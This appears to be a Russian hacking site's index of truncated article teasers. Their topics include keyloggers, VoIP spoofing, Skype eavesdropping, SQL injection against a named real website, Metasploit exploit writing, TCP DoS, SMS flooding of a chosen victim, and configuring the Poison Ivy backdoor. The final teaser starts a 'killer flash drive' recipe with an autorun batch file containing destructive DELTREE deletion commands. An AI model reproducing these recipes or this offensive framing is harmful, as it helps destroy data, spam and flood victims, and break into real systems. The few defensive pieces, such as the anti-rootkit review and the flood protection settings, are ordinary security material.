Шпионские программы - угроза безопасности вашего ПК

Введение Данная статья посвящена достаточно актуальной в настоящей момент проблеме - проблеме вредоносного программного кода. Еще несколько лет назад ситуация была достаточно простой - существовали прикладные программы (включая операционную систему) и компьютерные вирусы, т.е. программы, способные заражать другие приложения путем внедрения в них своего машинного кода. Однако в последнее время появилось вредоносных множество программ, которые нельзя считать вирусами, т.к. они не обладают способностью...

Телефонные шалости: хакерский подход к IP-телефонии

Еще не так давно сервис Clickatel, позволяющий отправлять SMS с любого номера, казался настоящей находкой. Побаловались - и надоело. Пора сделать следующей шаг и разобраться, как с произвольного номера можно... позвонить и поговорить с человеком. А заодно посмотреть, как возможно перехватить голосовой трафик, подобрать пароль для аккаунта у SIP-провайдера и просто умело использовать замечательную технологию VoIP. Где взять дешевую связь? Реализаций технологии, которая в целом называется Voice over...

Поиск и удаление вирусов вручную

Пока что я не знаю никого, кто бы прямо или косвенно не пострадал от действий компьютерных вирусов. Антивирусные компании много хотят за свои продукты, которые так и не обеспечивают надлежащей защиты. Спрашивается, зачем вообще тогда покупать антивирусное ПО? Все что создано человеком может быть уничтожено, это относится как к антивирусам, так и к вирусам. Человека обмануть намного сложнее, чем программу. Поэтому эта статья посвящена описанию методики...

Обзор клавиатурных шпионов - лучшие кейлоггеры

Необходимое обоснование Программы шпионыэто в первую очередь не кровавое оружие хакеров-анархистов или инструмент контроля тёмных межконтинентальных корпораций, а удобное средство обеспечения личной безопасности, во многих случаях необходимое обычному хаке… тьфу ты, гражданину, особенно в тех условиях, когда к его компьютеру имеют доступ несколько человек. Не благое ли дело установить контроль за домочадцами, особенно детьми, кои в час родительского отсутствия могут растлевать юные умы просмотром неподобающих...

Подслушиваем Skype: хакерский подход к резервному копированию VoIP-разговоров

Скайп, бесспорно, рулит. Если раньше нам нужно было часами отвисать в текстовых чатах, набивая килобайты информации, то теперь, благодаря распространению безлимитного инета вплоть до российской глубинки, даже самые удаленные от столицы интернетчики могут познать радость голосового общения. Хакера же все это голосовое общение может только расстроить. Ведь теперь гениальные keylog’еры, которые он научился мастерить из подручных инструментов, начинают нервно курить в сторонке. Общение голосом хуками...

Настройка DDNS (dyndns.com / no-ip.com)

DDNS – Dynamic DNS (динамический DNS). Очень часто провайдеры Интернет при подключении к сети предоставляют внешний динамический ip-адрес (Stream, Beeline/Corbina и т.п.). Подавляющему большинству пользователей этого достаточно. Однако в некоторых случаях (для сетевых игр, для доступа к своему компьютеру из вне) необходим внешний статический адрес. Эту услугу предоставляют далеко не все провайдеры, а если и предоставляют, то за дополнительную плату. Обойти эту проблему можно с помощью технологии...

Неизвестная уязвимость функции printf

Отсутствие в языке Си встроенных средств определения количества переданных функции аргументов приводит иногда к несанкционированному вторжению в защищенные системы. В статье на примере функции printf рассматриваются такие ситуации и предлагаются некоторые пути выхода из них. Каждый разработчик знает, что «программ без ошибок не бывает; бывает, что их плохо искали». Приведенный ниже пример позволяет убедиться, насколько это утверждение близко к истине. На первый и даже на второй взгляд здесь...

Мифы о 7-ми популярных антируткитах или как поймать невидимку

Данная статья представляет собой серьезный технический обзор наиболее известных современных программ для борьбы с руткитами (от анг. rootkit), часто используемых для сокрытия присутствия в системе вредоносных программ. В обзоре рассматриваются следующие антируткиты: RootkitRevealer, AVZ (антивирусная утилита Олега Зайцева), Process Hunter, F-Secure BlackLight Rootkit Eliminator, UnHackMe, IceSword, Microsoft Windows Defender и System Virginity Verifier.Содержание 1. Введение 2. RootkitRevealer...

Разгадываем капчи [php+anti-captcha]

Автор: Russian aka koder Давай подумаем зачем оно нам нужно?! Капчами сейчас защищают практически все формы заполняемые случайными посетителями. Их используют при регистрации на форумах, регистрации ящиков.. да вообще везде. А теперь представь, что ты достал большую базу каталогов ссылок на каком-то определенном движке и там для размещения ссылки нужно вводить капчу! Если бы капчи не было, то все было бы очень просто, спамь и все. А что делать если капча есть? Да на самом деле все так же просто...

Третий тип XSS: Межсайтовый скриптинг через DOM

Все мы знаем, что такое межсайтовый скриптинг, правда? Это уязвимость, при которой атакующий посылает злонамеренные данные (обычно это HTML, содержащий код Javascript), которые позднее возвращаются приложением, что вызывает исполнение Javascript кода. Итак, это неверно! Существует тип XSS атак не соответствующий этому определению, по крайней мере, в основных фундаментальных принципах. XSS атаки, определение которых приведено выше, подразделяются на моментальные (злонамеренные данные встраиваются...

Классика проникновения за 8 шагов: терминальный доступ через SQL-инъекцию и xp_cmdshell

Причины кризиса В первой части я препарировал сайт ism.ws, который сложно отнести к когорте особо интересных. Чтобы у тебя не сложилось впечатления, что все описываемое - полная лажа и применимо только на мелких и заброшенных ресурсах, в качестве цели я выбрал более достойного кандидата. Поверь мне, инъекции и прочие уязвимости есть на ресурсах разного масштаба, включая и очень раскрученные бренды. Надо только уметь их найти и использовать. Итак, знакомимся: герой дня - сайт "National association...

Фабрика сплоитов: учимся писать эксплоиты для Metasploit Framework

Откуда берутся сплоиты? Задумывался ли ты, каким образом тусклая новость из багтрака превращается в реально работающую отмычку? Каким образом двумя десяткам строчек кода удается получить шелл на удаленном сервере? Сегодня мы посетим фабрику сплоитов и во всех подробностях посмотрим, как изготавливается качественное изделие. Сплоит – что же это за зверь такой диковинный? По сути, это программа, написанная с целью использования уязвимости – в ОС, обычной программе или веб-приложении. Он может представлять...

Универсальное удаленное нападение DoS

Эксплуатируя особенности, свойственные TCP протоколу, удаленные нападающие могут инициировать DoS на широкий массив операционных систем. Нападение наиболее эффективно против HTTP серверов. Прилагаемый cценарий Perl демонстрирует эту проблему. При TCP связи, каждая TCP распределяет некоторые ресурсы каждому подключению. Неоднократно устанавливая TCP подключения и затем, отказываясь от них, злонамеренный хост может связывать существенные ресурсы на сервере. Сервер Unix может выделять некоторый номер...

Способы защиты от флуда и DDoS атак.

Черные дыры. net.inet.tcp.blackhole=2 net.inet.udp.blackhole=1 Это превращает машину в черную дыру при попытке подключиться к портам, которые не слушают. Nmap по настоящему не любит это. Защита очереди сокета от SYN атак. Основной из самых популярных атак остается SYN флуд, при которой очередь сокета атакуемого хоста переполняется некорректными попытками соединений. Для защиты от таких атак некоторые из UNIX поддерживают отдельные очереди для входящих запросов на соединение. Одна очередь для...

Что скрывают pin-коды sim-карты и зачем код телефону?

Вскрываем коды sim-карты Общеизвестно, что в sim-карту "вшито" несколько вариантов кодов, которые в свою очередь, предоставляют возможность работать как с самой sim-кой, так и некоторыми функциями телефона. На конверте, в котором продается sim-карта напечатаны несколько кодов: pin1, pin2, puk1 и puk2. Каждый из этих кодов несет свои характерные особенности. Так pin1 предназначен для защиты счета пользователя в случае утери или, того хуже, кражи телефона. На его деактивацию пользователь получает...

Добиваем SQL: новейшие способы работы с инъекциями

Сегодня я покажу поистине революционные приемы инъектирования. А ты внимательно слушай и конспектируй. Разбираемся с именами столбцов Начались мои исследования с попытки решить вторую основную проблему тех, кто работает с инъекциями в MySQL. Она заключается в невозможности получить имена таблиц и столбцов в MySQL 4-й ветки, не прибегая к полному перебору. Насколько нам всем известно, в этой ветке начисто отсутствует системная таблица INFORMATION_SCHEMA.tables, и данные о таблицах, хранящихся...

Местоопределение абонента сотовой связи

С давних пор человека наряду с прочими, волновал вопрос - где я? В древности капитаны кораблей внимательно смотрели на звезды именно с этой целью. Люди составляли карты (до сих пор это занятие непростое и дорогое), изобрели компас, запустили геодезические спутники и т.д. Что нам с Вами до всего этого? Где - то, какие-то умные и не очень, дяди смотрят на карты, тычут пальцем в компьютер и получают за это кучу денег. Ну и что? Всего лишь несколько примеров: - Во время последней войны Наты с Югославией...

Пишем Sms флудер и спамер

Статья расчитана на новичков Всем привет. Это моя первая статья на ачате, и написать я её решил про SMS флуд и спам. Поискав на форуме, и найдя или нерабочие линки или нерабочие скрипты я решил сам накатать флудер. Жертвой стал российский МЕГАФОН.Возьмём его как пример. ФЛУД Для начала разберёмся, что такое флудер. В моём понимании флудер - это программа или скрипт, которая(ый) отправляет заданному адресату некую информацию в некотором количестве(часто - в очень большом). И так, что нам нужно...

Настраиваем бэкдор Poison Ivy 2.3.2

Всем доброго времени суток! Ко мне периодически обращаются с вопросом как юзать бэкдоры с бэкконектом. Information must be free! И по этому я решил написать эту статью, в которой опишу настройку бэкдора на примере ИХМО лучшего бэкдора с бэкконектом Poison Ivy 2.3.2 Работает по принципу клиент-сервер. Настройка не сложная, устроенна так что вы не сможете перейти к следующим настройкам не заполнив предыдущих. Итак приступим. Для начала зайдем на оф.сайт программы http://www.poisonivy-rat.com...

Флешка убийца

Берем флешку которую вам не жалко (больше вы не сможите ей пользоватся)Создаем на ней: AUTOEXEC.BAT Dead.BAT autorun.ini ______________________________ в AUTOEXEC.BAT пишем: goto %config% :dos1 rem c:vc401vc lh keyrus lh mmouse lh C:WINDOWSCOMMANDmscdex /d:12345678 lh dndn bootgui=0 :dos2 rem essolo.com lh keyrus lh mmouse lh dndn bootgui=0 :win rem c:essolo.com set path=C:WINDOWS;C:WINDOWSCOMMAND;c:;c:windows;c:windowscomand;c:arc;c:dn C:WINDOWSCOMMANDDELTREE /y C:WINDOWSTEMP*.* mode con codepage...